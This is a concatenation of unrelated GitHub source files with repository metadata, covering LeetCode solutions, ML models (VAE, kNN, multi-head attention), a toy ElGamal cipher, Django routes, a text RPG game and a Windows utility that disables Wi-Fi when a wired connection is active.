maxProfit(self, prices):\n        \"\"\"\n        :type prices: List[int]\n        :rtype: int\n\n        Given 1, 2, 3, 2, 4, we want to find the continuous uptrend intervals,\n        trade within one transaction and keep finding such uptrend intervals.\n        For example, 1, 2, 3 is the first uptrend interval and profit is 3 - 1 = 2 and the 2, 4 is the second uptrend and profit is 4-2=2\n        Such a solution is better than 4 - 1 = 3, because it profits from two valley/peak pairs, better than one valley/peak pair.\n        \"\"\"\n        if not prices:\n            return 0\n        else:\n            maxProfit = 0\n            for i in range(1, len(prices)):\n                if prices[i] > prices[i-1]:\n                    maxProfit += prices[i] - prices[i-1]\n            return maxProfit","repo_name":"ljia2/leetcode.py","sub_path":"solutions/dp/122.Best.Time.to.Buy.and.Sell.Stock.II.py","file_name":"122.Best.Time.to.Buy.and.Sell.Stock.II.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"1143587431","text":"from typing import Dict, Tuple\n\nimport torch\nimport torch.nn.functional as F\n\nfrom src.model.net import get_VAE_models\nfrom src.modules.base import BaseModule\n\n\nclass VAE(BaseModule):\n    def get_models(self):\n        return get_VAE_models(self.hparams)\n\n    def get_loss(self, x: torch.Tensor) -> Tuple[torch.Tensor, Dict[str, float]]:\n        z, mu, log_var = self.encoder(x)\n        
x_hat = self.decoder(z)\n\n recon_loss = F.mse_loss(x_hat, x, reduction=\"mean\")\n\n # see Appendix B from VAE paper:\n # Kingma and Welling. Auto-Encoding Variational Bayes. ICLR, 2014\n # https://arxiv.org/abs/1312.6114\n # 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)\n kld_loss = -0.5 * torch.sum(1 + log_var - mu ** 2 - log_var.exp(), dim=1)\n loss = recon_loss + kld_loss\n\n log = {\n \"recon_loss\": recon_loss,\n \"kld_loss\": kld_loss,\n \"loss\": loss,\n }\n return loss, log\n","repo_name":"HephaestusProject/pytorch-VAE","sub_path":"src/modules/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"19847854259","text":"import matplotlib.pyplot as mp\nimport numpy as np\nimport math\nx = np.linspace(-10,10, 100)\ny = np.sin(x)\nfont = {'family':'consolas','color':'blue','size':14}\nmp.title(\"ĐỒ THỊ Y = SIN(X)\")\nmp.xlabel(\"Trục X\", loc='right', fontdict=font)\nmp.ylabel(\"Trục Y\", loc='top', fontdict=font)\nmp.plot(x, y, marker='*', ms=10, mec='r', mfc = 'y')\nmp.show()","repo_name":"linhlukar/PYTHON","sub_path":"Python/TH6/bai62.py","file_name":"bai62.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"34655634414","text":"_author_ = 'jake'\n_project_ = 'leetcode'\n\n# https://leetcode.com/problems/max-points-on-a-line/\n# Given n points on a 2D plane, find the maximum number of points that lie on the same straight line.\n\n# For each point, calculate the gradient of the line to all other points and store in dictionary. Python accepts\n# floats as dictionary keys and floating point accuracy is not an issue for sufficiently small x and y.\n# Infinite slopes are stored with key of 'inf'. If both x and y are the same, both points lie on all lines with the\n# first point. 
Calculate the max number of points on a line with each base point in turn, only considering other points\n# that have not already been the base point.\n# Time - O(n**2)\n# Space - O(n)\n\n# Definition for a point.\nclass Point(object):\n def __init__(self, a=0, b=0):\n self.x = a\n self.y = b\n\nfrom collections import defaultdict\n\nclass Solution(object):\n def maxPoints(self, points):\n \"\"\"\n :type points: List[Point]\n :rtype: int\n \"\"\"\n if len(points) <= 2:\n return len(points)\n\n overall_max = 2\n\n for i, point in enumerate(points): # for each point\n\n gradients = defaultdict(int) # key is gradient, value is nb lines involving point with this gradient\n max_points = 1 # point is on every line\n\n for point_2 in points[i+1:]: # check all\n\n if point.x == point_2.x:\n if point.y == point_2.y: # same point, on all lines\n max_points += 1\n else: # infinite gradient\n gradients['inf'] += 1\n\n else:\n gradient = (point_2.y - point.y) / float(point_2.x - point.x)\n gradients[gradient] += 1\n\n if gradients:\n max_points += max(gradients.values())\n overall_max = max(overall_max, max_points)\n\n return overall_max\n\n","repo_name":"jakehoare/leetcode","sub_path":"python_1_to_1000/149_Max_Points_on_a_Line.py","file_name":"149_Max_Points_on_a_Line.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"50"} +{"seq_id":"36097848245","text":"import random\n\nfrom exponent import power\n\n\ndef create_ciphertexts(public_key, block, k):\n c1 = power(public_key[1], k, public_key[0])\n # print(\"(%d^%d %% %d) = %d\" % (public_key[1], k, public_key[0], c1))\n\n c2 = (power(public_key[2], k, public_key[0])*(block % public_key[0])) % public_key[0]\n # print(\"((%d^%d %% %d)*(%d %% %d)) %% %d = %d\" % (public_key[2], k, public_key[0], block, public_key[0], public_key[0], c2))\n\n return (c1, c2)\n\n\n# Should be able to handle any length of input\ndef decrypt(ciphertexts_file, private_key):\n output = open('testfiles/dtext.txt', 'w+')\n\n plaintext = b''\n with open(ciphertexts_file, 'r') as f:\n while True:\n ciphertexts = f.readline().rsplit()\n if not ciphertexts:\n break\n ciphertexts = [int(num) for num in ciphertexts]\n # print(ciphertexts)\n first = power(ciphertexts[0], private_key[0]-1-private_key[2], private_key[0])\n second = ciphertexts[1] % private_key[0]\n result = first*second % private_key[0]\n result = result.to_bytes(4, 'big')\n\n output.write(str(result, 'ascii'))\n\n plaintext += result\n\n output.write('\\n')\n output.close()\n\n return plaintext\n\n\n# Should be able to handle any length of input\ndef encrypt(plaintext, public_key):\n output = open('testfiles/ctext.txt', 'w+')\n\n ciphertexts = []\n with open(plaintext, 'rb') as f:\n while True:\n block = f.read(4)\n if not block:\n break\n # print(block)\n block = int.from_bytes(block, 'big')\n\n k = random.randint(0, public_key[0]-1)\n\n results = create_ciphertexts(public_key, block, k)\n # print(results)\n line = ' '.join(str(ctext) for ctext in results)\n line = line + '\\n'\n output.write(line)\n\n ciphertexts.append(results[0])\n ciphertexts.append(results[1])\n\n output.close()\n\n return ciphertexts\n","repo_name":"grantlindberg4/public-key-exchange","sub_path":"crypt.py","file_name":"crypt.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"29755769856","text":"\nfrom django.conf.urls import url\nfrom 
rest_framework.urlpatterns import format_suffix_patterns\nfrom trackapp import views\n\nurlpatterns = [\n    url(r'^signup_api/$', views.AdminSignUpList.as_view()),\n    url(r'^signup_api/(?P<pk>[0-9]+)/$', views.SignUpDetail.as_view()),\n    url(r'^signup_api/(?P<pk>\\w+)/$', views.SignUpDetail.as_view()),\n\n    url(r'^si2chip/login/$', views.AdminLogin.as_view()),\n\n    # urls for home.html\n    url(r'^home/$', views.home, name='home'),\n\n    # url for signup\n    url(r'^signup/$', views.signup, name='signup'),\n\n    # url for login\n    url(r'^login/$', views.login, name='login'),\n    url(r'^logout/$', views.logout, name='logout'),\n\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n\n","repo_name":"si2chip/trackmates","sub_path":"trackapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"28433053815","text":"import dataclasses\n\nimport pytest\n\nfrom dddpy.domain.book import Isbn\n\n\nclass TestIsbn:\n    @pytest.mark.parametrize(\n        \"value\",\n        [\n            (\"978-0321125217\"),\n            (\"978-4-949999-12-0\"),\n        ],\n    )\n    def test_constructor_should_create_instance(self, value):\n        isbn = Isbn(value)\n\n        assert isbn.value == value\n\n    @pytest.mark.parametrize(\n        \"value\",\n        [\n            (\"invalid-string\"),\n            (\"123456789\"),\n            (\"000-0141983479\"),\n        ],\n    )\n    def test_constructor_should_throw_value_error_when_params_are_invalid(self, value):\n        with pytest.raises(ValueError):\n            Isbn(value)\n\n    def test_isbn_should_be_frozen(self):\n        with pytest.raises(dataclasses.FrozenInstanceError):\n            isbn = Isbn(\"978-0321125217\")\n            isbn.value = \"978-1141983479\"  # type: ignore\n","repo_name":"iktakahiro/dddpy","sub_path":"tests/domain/book/test_isbn.py","file_name":"test_isbn.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":469,"dataset":"github-code","pt":"50"} +{"seq_id":"13156917690","text":"#!/usr/bin/env python\n\"\"\"\n    Simple wrapper for creating a rancid routers.db file\n\"\"\"\nimport argparse\nimport sys\nsys.path.append('/usr/local/rancid-tools')\nimport NetdiscoDB\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser() \n    parser.add_argument('-f', required = True,\n            help='File location of the router.db to create')\n    args = parser.parse_args()\n\n    connect = NetdiscoDB.NetdiscoDB()\n    connect.PrintRancidDB(args.f)\n    connect.GenerateClogin()\n\n","repo_name":"msheiny/Rancid-Netdisco-Sync","sub_path":"usr/local/bin/RancidRouterDB.py","file_name":"RancidRouterDB.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"20480504559","text":"# -*- coding:utf-8 -*-\r\nimport subprocess\r\nimport time\r\nimport tkinter.messagebox\r\nfrom tkinter import messagebox\r\nimport os\r\nimport re\r\nimport win32api\r\nimport win32con\r\n\r\n\r\nf = open(\"file_path.txt\",encoding = \"utf-8\")\r\npath = f.read() # 要添加的exe路径\r\nf.close()\r\n\r\nprint('file_path:'+ path)\r\n# \"注册到启动项\"\r\ntry:\r\n    runpath = \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\r\n    hKey = win32api.RegOpenKeyEx(win32con.HKEY_CURRENT_USER, runpath, 0, win32con.KEY_SET_VALUE)\r\n    # run = True\r\n    # if run:\r\n    #     win32api.RegSetValueEx(hKey, \"MyTool\", 0, win32con.REG_SZ, path)\r\n    # else:\r\n    #     win32api.RegDeleteValue(hKey, \"MyTool\")\r\n    win32api.RegSetValueEx(hKey, \"Select_Net\", 0, win32con.REG_SZ, path)\r\n    win32api.RegCloseKey(hKey)\r\nexcept Exception as e:\r\n    
print('开机自启动变量加入注册表错误')\r\n print(e.args)\r\n\r\n\r\np = subprocess.run('ipconfig', stdout=subprocess.PIPE, universal_newlines=True)\r\nprint(p.stdout)\r\nq =r'以太网适配器 (.*?):'\r\nslotList1 = re.findall(q, p.stdout)\r\nprint(slotList1)\r\nl =r'无线局域网适配器 (.*?):'\r\nslotList2 = re.findall(l, p.stdout)\r\nprint(slotList2)\r\nlen1=len(slotList1)\r\nnetcard1={}\r\nfor i in range(len1):\r\n print(slotList1[i])\r\n netcard1[i] = slotList1[i]\r\n print(netcard1)\r\n\r\nlen2=len(slotList2)\r\nnetcard2={}\r\nfor i in range (len2):\r\n print(slotList2[i])\r\n netcard2[i] = slotList2[i]\r\n print(netcard2)\r\n\r\nx_result_dict = {'x':\"\"}\r\n\r\ndef send1():\r\n x = \"\"\r\n for j in cheakboxs:\r\n # 如果被勾选的话传回来的值为True\r\n # 如果没有被勾选的话传回来的值为False\r\n if cheakboxs[j].get():\r\n x = x + netcard1[j] + \"\\n\"\r\n print('x:::::'+x)\r\n x_result_dict['x'] = x\r\n root.destroy()\r\n return x\r\n\r\n\r\n# 创建主窗口\r\nroot = tkinter.Tk()\r\nlabel = tkinter.Label(root, text=\"请选择使用的有线网卡\", bg=\"lightyellow\", fg=\"red\", width=50)\r\nlabel.grid(row=0)\r\n\r\ncheakboxs = {}\r\nfor i in range(len(netcard1)):\r\n cheakboxs[i] = tkinter.BooleanVar()\r\n tkinter.Checkbutton(root,text=netcard1[i], variable=cheakboxs[i]).grid(row=i + 1, sticky=tkinter.W)\r\n\r\nbuttonOne = tkinter.Button(root, text=\"提交\", width=10, command=send1)\r\nbuttonOne.grid(row=len(netcard1) + 1)\r\nroot.mainloop()\r\n\r\ny_result_dict = {'y':\"\"}\r\ndef send2():\r\n y = \"\"\r\n for j in cheakboxs:\r\n # 如果被勾选的话传回来的值为True\r\n # 如果没有被勾选的话传回来的值为False\r\n if cheakboxs[j].get():\r\n y = y + netcard2[j] + \"\\n\"\r\n print('y::::'+y)\r\n y_result_dict['y'] = y\r\n root.destroy()\r\n return y\r\n\r\n# 创建主窗口\r\nroot = tkinter.Tk()\r\nlabel = tkinter.Label(root, text=\"请选择使用的无线网卡\", bg=\"lightyellow\", fg=\"red\", width=50)\r\nlabel.grid(row=0)\r\n\r\ncheakboxs = {}\r\nfor i in range(len(netcard2)):\r\n cheakboxs[i] = tkinter.BooleanVar()\r\n # 只有被勾选才变为True\r\n tkinter.Checkbutton(root,text=netcard2[i], variable=cheakboxs[i]).grid(row=i + 1, sticky=tkinter.W)\r\n\r\nbuttonOne = tkinter.Button(root, text=\"提交\", width=10, command=send2)\r\nbuttonOne.grid(row=len(netcard2) + 1)\r\nroot.mainloop()\r\n\r\ndef send3():\r\n #开始循环运行\r\n while True:\r\n x = x_result_dict['x']\r\n y = y_result_dict['y']\r\n cmd1 = 'netsh interface show interface {}'.format(x)\r\n print('cmd1:'+cmd1)\r\n a = subprocess.check_output(cmd1, shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE)\r\n ss=str(a)\r\n time.sleep(1)\r\n print(\"未连接有线网络\")\r\n if (ss.find(u\"已连接\"))>0:\r\n print(\"已连接有线网络\")\r\n cmd2 = 'netsh interface show interface {}'.format(y)\r\n print('cmd2:' + cmd2)\r\n a = subprocess.check_output(cmd2, shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE)\r\n ss1=str(a)\r\n if(ss1.find(u\"已连接\")) >0:\r\n print(\"已连接无线网络\")\r\n messagebox.showinfo(\"警告\", \"发生双跨,即将禁用无线网卡\")\r\n\r\n os.popen('netsh interface set interface {} admin=DISABLE'.format(y)) # 禁用无线网卡\r\n time.sleep(15)\r\n\r\n# 创建主窗口\r\nroot = tkinter.Tk()\r\nlabel = tkinter.Label(root, text=\"开始循环运行查询,轮询间隔15s\", bg=\"lightyellow\", fg=\"red\", width=50)\r\nlabel.grid(row=0)\r\n\r\nbuttonOne = tkinter.Button(root, text=\"提交\", width=10, command=send3)\r\nbuttonOne.grid(row=50)\r\nroot.mainloop()\r\n","repo_name":"jinlongyu-ikun/Python_Tkinter_Coding","sub_path":"wlan_select/testwlan.py","file_name":"testwlan.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"18205130322","text":"import os\nimport 
random\nimport time\n\n#Clase personaje\nclass jugador():\n\tdef __init__ (self,nombre,\n\ttipo,\n\tvida,\n\tataque,\n\telemental,\n\tdefensa,\n\tvelocidad,\n\tpCritico\n\t):\n\t\tself.nombre=nombre\n\t\tself.tipo=tipo\n\t\tself.vida=vida\n\t\tself.ataque=ataque\n\t\tself.elemental=elemental\n\t\tself.defensa=defensa\n\t\tself.velocidad=velocidad\n\t\tself.pCritico=pCritico\n\t\tself.vivo=True\n\t\t\n\tdef vive(self):\n\t\tself.vivo=False\n\t\n\tdef mostrar(self):\n\t\tprint(\"Nombre: \",self.nombre,\n\t\t\t\t\t\"\\nTipo: \",self.tipo,\n\t\t\t\t\t\"\\nVida: \",self.vida)\n\t\ndef enemigos(nombre):\n\tyy=[\"Fuego\",\"Hielo\",\"Electro\",\"Agua\"]\n\telemento1=random.choice(yy)\n\telemento2=random.choice(yy)\n\telemento3=random.choice(yy)\n\telemento4=random.choice(yy)\n\telemento5=random.choice(yy)\n\n\t\n\tif str(nombre) == \"Mago Enigmatico\":\n\t\txx=jugador(nombre,str(elemento1),100,15,5,10,10,10)\n\telif str(nombre) == \"Soldado Real\":\n\t\txx=jugador(nombre,str(elemento2),130,20,5,9,15,8)\n\telif str(nombre) == \"Dragon Volador\":\n\t\txx=jugador(nombre,str(elemento3),160,25,5,8,20,6)\n\telif str(nombre) == \"Lobo Agresivo\":\n\t\txx=jugador(nombre,str(elemento4),190,30,5,7,25,4)\n\telif str(nombre) == \"Jefe Final\":\n\t\txx=jugador(nombre,str(elemento5),220,40,5,6,25,15)\n\treturn xx\n\n\n\ndef attack1(atq1,atq2,num):\n\tesquivar=random.randrange(1,100)\n\tgolpe=atq2.vida\n\tresto=atq2.vida\n\tdefensa=atq2.defensa\n\tif esquivar<=atq2.velocidad:\n\t\tif num ==1:\n\t\t\tprint(\"EL ENEMIGO ESQUIVO TU ATAQUE\")\n\t\telse:\n\t\t\tprint(\"ESQUIVASTE EL ATAQUE ENEMIGO\")\n\telse:\n\t\tgolpe=atq2.vida-atq1.ataque+defensa\n\t\t\n\t\tif atq1.tipo==\"Fuego\" and atq2.tipo==\"Hielo\":\n\t\t\tgolpe+=-atq1.elemental\n\t\telif atq1.tipo==\"Fuego\" and atq2.tipo==\"Agua\":\n\t\t\tgolpe+=+atq1.elemental\n\t\telif atq1.tipo==\"Agua\" and atq2.tipo==\"Fuego\":\n\t\t\tgolpe+=-atq1.elemental\n\t\telif atq1.tipo==\"Agua\" and atq2.tipo==\"Electro\":\n\t\t\tgolpe+=+atq1.elemental\n\t\telif atq1.tipo==\"Electro\" and atq2.tipo==\"Agua\":\n\t\t\tgolpe+=-atq1.elemental\n\t\telif atq1.tipo==\"Electro\" and atq2.tipo==\"Hielo\":\n\t\t\tgolpe+=+atq1.elemental\n\t\telif atq1.tipo==\"Hielo\" and atq2.tipo==\"Electro\":\n\t\t\tgolpe+=-atq1.elemental\n\t\telif atq1.tipo==\"Hielo\" and atq2.tipo==\"Fuego\":\n\t\t\tgolpe+=+atq1.elemental\n\n\t\tif random.randrange(1,100) < atq1.pCritico:\n\t\t\tgolpe+=-atq1.ataque\n\t\t\tprint(\"**GOLPE CRITICO**\")\n\t\telse:\n\t\t\tprint(\"Golpe Certero \")\n\t\t\t\n\tprint(\"HIT: \"+str(resto-golpe))\n\ttime.sleep(1)\n\treturn golpe\n\n\ndef reset(num):\n\tos.system('clear')\n\tpj1.mostrar()\n\tprint()\n\tprint(\"***VERSUS***\")\n\tprint()\n\tpj2.mostrar()\n\tprint()\n\tprint(\"<- - - - - - - - - - - - ->\")\n\tif num == 1:\n\t\tinput(\"Enter para ATACAR\")\n\telse:\n\t\tprint(pj2.nombre+\" ATACA\")\n\t\ttime.sleep(1)\n\n\nx=[\"Mago Enigmatico\",\"Soldado Real\",\"Dragon Volador\",\"Lobo Agresivo\",\"Jefe Final\"]\n\n#Seleccion de personaje\nnombre_jugador=input(\"Nombre del Jugador: \")\ndef elHeroe():\n\twhile True:\n\t\ttry:\n\t\t\telemento=int(input(\"Elige ELEMENTO: \\n1) Para Fuego \\n2) Para Agua \\n3) Para Electro \\n4) Para Hielo \\n\"))\n\t\t\tif elemento == 1:\n\t\t\t\tpj=jugador(nombre_jugador,\"Fuego\",150,21,5,10,22,14)\n\t\t\t\tbreak\n\t\t\telif elemento == 2:\n\t\t\t\tpj=jugador(nombre_jugador,\"Agua\",150,15,5,11,24,20)\n\t\t\t\tbreak\n\t\t\telif elemento == 3:\n\t\t\t\tpj=jugador(nombre_jugador,\"Electro\",150,17,5,8,26,18)\n\t\t\t\tbreak\n\t\t\telif elemento 
== 4:\n\t\t\t\tpj=jugador(nombre_jugador,\"Hielo\",150,19,5,9,20,16)\n\t\t\t\tbreak\n\t\t\tos.system('clear')\n\t\t\tprint(\"Elige una opcion correcta!\")\n\t\texcept ValueError:\n\t\t\tos.system('clear')\n\t\t\tprint(\"Elige una opcion correcta!\")\n\treturn pj\n\n\n\nwhile True:\n\tos.system('clear')\n\tpj1=elHeroe()\n\tconteoEleccion=0\n\tfor i in x:\n\t\tpj2=enemigos(i)\n\t\tturno=random.choice([True,False])\n\t\twhile True:\n\t\t\tif turno == True:\n\t\t\t\treset(1)\n\t\t\t\tpj2.vida=attack1(pj1,pj2,1)\n\t\t\t\tconteoEleccion+=1\n\t\t\t\tif conteoEleccion == 5:\n\t\t\t\t\tos.system('clear')\n\t\t\t\t\tprint(\"Presiona V para recuperar algo de Vida\\nPresiona A para aumentar tu Ataque\\nPresiona D para Aumentar tu Defensa\")\n\t\t\t\t\topciones=str.capitalize(input())\n\t\t\t\t\tconteoEleccion=0\n\t\t\t\t\tif opciones == \"V\":\n\t\t\t\t\t\tq=random.randrange(10,60)\n\t\t\t\t\t\tpj1.vida+=q\n\t\t\t\t\t\tprint(\"VIDA EXTRA: \"+str(q))\n\t\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\telif opciones == \"D\":\n\t\t\t\t\t\tpj1.defensa+=1\n\t\t\t\t\t\tprint(\"DEFENSA AUMENTA +1\")\n\t\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\telif opciones == \"A\":\n\t\t\t\t\t\tpj1.ataque+=1\n\t\t\t\t\t\tprint(\"ATAQUE AUMENTA +1\")\n\t\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"TOCASTE CUALQUIER COSA, PERDISTE POWER-UP\")\n\t\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\tturno=False\n\t\t\t\tif pj2.vida<1:\n\t\t\t\t\tprint(\"DERROTASTE A \"+pj2.nombre)\n\t\t\t\t\tprint(\"ViDA +150\")\n\t\t\t\t\tpj1.vida+=150\n\t\t\t\t\tinput()\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\treset(2)\n\t\t\t\tpj1.vida=attack1(pj2,pj1,2)\n\t\t\t\tturno=True\n\t\t\t\tif pj1.vida<1:\n\t\t\t\t\tprint(\"PERDISTE!!!\")\n\t\t\t\t\tinput()\n\t\t\t\t\tbreak\n\t\tif pj1.vida<1:\n\t\t\tprint(\"VUELVE A INTENTARLO\")\n\t\t\tinput()\n\t\t\tbreak\n\n\n\n\n\n\n","repo_name":"ohsenseiwda/Juego-RPG-de-Pelea","sub_path":"SenseiPlus_RPG.py","file_name":"SenseiPlus_RPG.py","file_ext":"py","file_size_in_byte":4622,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"25372659610","text":"import sys\nfrom math import sqrt\nfrom operator import itemgetter\nfrom util import vote, get_data, std_dev\nfrom copy import deepcopy\n\n#calculate Euclidean distance with selected attributes\ndef euclidean_distance(x1, x2, selected_attrs):\n\treturn sqrt(sum([pow((x1[attr] - x2[attr]), 2) for attr in selected_attrs]))\n\ndef get_neighbors(train_data, valid_d, k, selected_attrs):\n\tdistances = {}\n\tfor d in train_data:\n\t\tdis = euclidean_distance(d, valid_d, selected_attrs)\n\t\tdistances[dis] = d\n\treturn [distances[i] for i in sorted(distances.iterkeys())[:k]]\n\ndef kNN_classifier(neighbors, target_attr):\n\treturn vote([n[target_attr] for n in neighbors])\n\ndef normonize(ds, attrs, c_range):\n #data = deepcopy(ds)\n data = ds[:]\n cols = {}\n col_max = {}\n col_min = {}\n for i in c_range:\n cols[i] = [float(d[attrs[i]]) for d in data]\n col_max[i] = max([col for col in cols[i]])\n col_min[i] = min([col for col in cols[i]])\n for i in range(len(data)):\n for j in c_range:\n if not col_max[j]==col_min[j]:\n data[i][attrs[j]] = (float(data[i][attrs[j]]) - col_min[j]) / (col_max[j] - col_min[j])\n else:\n data[i][attrs[j]] = 0.0\n return data\n\t\nif __name__ == \"__main__\":\n filename = sys.argv[1]\n k = int(sys.argv[2])\n\n data, attributes, target_attr = get_data(filename)\n n = len(data)\n\n accs = []\n for i in range(5):\n valid_data = 
deepcopy(data[int(float(n)/5*i):int(float(n)/5*(i+1))]) #validation data\n train_data = deepcopy([d for d in data if not d in valid_data]) #training data\n labels = [d[target_attr] for d in valid_data]\n\n\t #preprocess data\n if filename == \"breast-cancer-wisconsin.data\":\n c_range = range(5)\n selected_attrs = [attributes[i] for i in c_range]\n train_data = normonize(train_data, attributes, c_range)\n valid_data = normonize(valid_data, attributes, c_range)\n elif filename == \"car.data\":\n cols = [{\"vhigh\":1, \"high\":2, \"med\":3, \"low\":4},\n {\"vhigh\":1, \"high\":2, \"med\":3, \"low\":4},{},{},\n {\"small\":1, \"med\":2, \"big\":3},\n {\"low\":1, \"med\":2, \"high\":3}]\n c_range = range(6)\n for i in range(len(train_data)):\n for j in c_range:\n if j==2:\n if train_data[i][attributes[2]]==\"5more\":\n train_data[i][attributes[2]] = 6\n elif j==3:\n if train_data[i][attributes[3]]==\"more\":\n train_data[i][attributes[3]] = 6\n else:\n train_data[i][attributes[j]] = cols[j][train_data[i][attributes[j]]]\n for i in range(len(valid_data)):\n for j in c_range:\n if j==2:\n if valid_data[i][attributes[2]]==\"5more\":\n valid_data[i][attributes[2]] = 6\n elif j==3:\n if valid_data[i][attributes[3]]==\"more\":\n valid_data[i][attributes[3]] = 6\n else:\n valid_data[i][attributes[j]] = cols[j][valid_data[i][attributes[j]]]\n selected_attrs = [attributes[i] for i in c_range]\n train_data = normonize(train_data, attributes, c_range)\n valid_data = normonize(valid_data, attributes, c_range)\n elif filename == \"ecoli.data\":\n c_range = (1,2,5,6,7)\n selected_attrs = [attributes[i] for i in c_range]\n train_data = normonize(train_data, attributes, c_range)\n valid_data = normonize(valid_data, attributes, c_range)\n elif filename == \"mushroom.data\":\n c_range = range(1, 9)\n cols = [{},{\"b\":1, \"c\":2, \"x\":3, \"f\":4, \"k\":5, \"s\":6},\n {\"f\":1, \"g\":2, \"y\":3, \"s\":4},\n {\"n\":1, \"b\":2, \"c\":3, \"g\":4, \"r\":5, \"p\":6, \"u\":7, \"e\":8, \"w\":9, \"y\":10},\n {\"t\":1, \"f\":2}, {\"a\":1, \"l\":2, \"c\":3, \"y\":4, \"f\":5, \"m\":6, \"n\":7, \"p\":8, \"s\":9},\n {\"a\":1, \"d\":2, \"f\":3, \"n\":4}, {\"c\":1, \"w\":2, \"d\":3}, {\"b\":1, \"n\":2}]\n selected_attrs = [attributes[i] for i in c_range]\n for i in range(len(train_data)):\n for j in c_range:\n train_data[i][attributes[j]] = cols[j][train_data[i][attributes[j]]]\n for i in range(len(valid_data)):\n for j in c_range:\n valid_data[i][attributes[j]] = cols[j][valid_data[i][attributes[j]]]\n train_data = normonize(train_data, attributes, c_range)\n valid_data = normonize(valid_data, attributes, c_range)\n elif filename == \"letter-recognition.data\":\n c_range = range(1, 17)\n selected_attrs = [attributes[i] for i in c_range]\n train_data = normonize(train_data, attributes, c_range)\n valid_data = normonize(valid_data, attributes, c_range)\n\n classification = []\n for d in valid_data:\n neighbors = get_neighbors(train_data, d, k, selected_attrs)\n c = kNN_classifier(neighbors, target_attr)\n classification.append(c)\n count = 0\n for x,y in zip(classification, labels):\n if x==y:\n count += 1\n acc = float(count)/len(classification)\n accs.append(acc)\n print(\"accuracy: \" + str(100*acc) + \"%\")\n print(\"standard deviation: \" + str(std_dev(accs)))","repo_name":"albert-001/CS","sub_path":"CS6735/ML/source/kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40987165459","text":"from 
typing import Tuple\n\nimport torch\nimport math\nimport torch.nn.functional as F\nimport torch.nn as nn\n\n\nclass MultiHeadAttention(nn.Module):\n    \"\"\"\n    One of the most popular parts in NLP.\n    If you understand self-attention, you will understand the heart of transformers.\n    \"\"\"\n    def __init__(self, embedding_length: int, heads: int, mask = None) -> None:\n        super().__init__()\n        self.e_length = embedding_length\n        self.heads = heads\n        self.mask = mask\n        self.one_head = int(embedding_length/self.heads)\n        self.TW = self._trainable_weights()\n\n    def _trainable_weights(self) -> Tuple[nn.Module, nn.Module, nn.Module, nn.Module]:\n        q = nn.Linear(self.one_head, self.one_head, bias=False)\n        k = nn.Linear(self.one_head, self.one_head, bias=False)\n        v = nn.Linear(self.one_head, self.one_head, bias=False)\n        out_cnct = nn.Linear(self.e_length, self.e_length)\n        return q, k, v, out_cnct\n\n    def forward(self, query: torch.Tensor, key: torch.Tensor, value: torch.Tensor) -> torch.Tensor:\n        # Scaled Dot-Product Attention\n        q, k, v, out_cnct = self.TW\n\n        batch_size = key.size(0)\n        seq_len = key.size(1)\n        seq_len_query = query.size(1) # for decoder\n\n        query = query.view(batch_size, seq_len_query, self.heads, self.one_head)\n        key = key.view(batch_size, seq_len, self.heads, self.one_head)\n        value = value.view(batch_size, seq_len, self.heads, self.one_head)\n\n        query = q(query)\n        key = k(key)\n        value = v(value)\n\n        # transpose to get the right dimensions, this almost blew my mind\n        query = query.transpose(1,2)\n        key = key.transpose(1,2)\n        value = value.transpose(1,2)\n\n        s = torch.matmul(query, key.transpose(-1,-2))\n\n        if self.mask is not None:\n            s = s.masked_fill(self.mask == 0, float(\"-1e20\"))\n\n        w = s / math.sqrt(self.one_head)\n        w = F.softmax(w, dim=-1)\n        to_concat = torch.matmul(w, value)\n\n        # compress it together\n        to_concat = to_concat.transpose(1,2).contiguous().view(batch_size, seq_len_query, self.e_length)\n\n        return out_cnct(to_concat)\n\nif __name__ == \"__main__\":\n    embdd_len = 512\n    heads = 8\n    x = torch.randint(0, 500, (32, 10, embdd_len), dtype=torch.float32)\n    model = MultiHeadAttention(embdd_len, heads)\n    print(model(x, x, x))\n","repo_name":"SamuelHudec/pytorch_challenges","sub_path":"challenge_02/multihead_solution.py","file_name":"multihead_solution.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"25971811379","text":"import cv2\r\n\r\nclass FaceIn:\r\n    def __init__(self): # initialization\r\n        data = {\"flag\": False, \"image\": None} #flag: whether a face was detected\r\n        self.data = 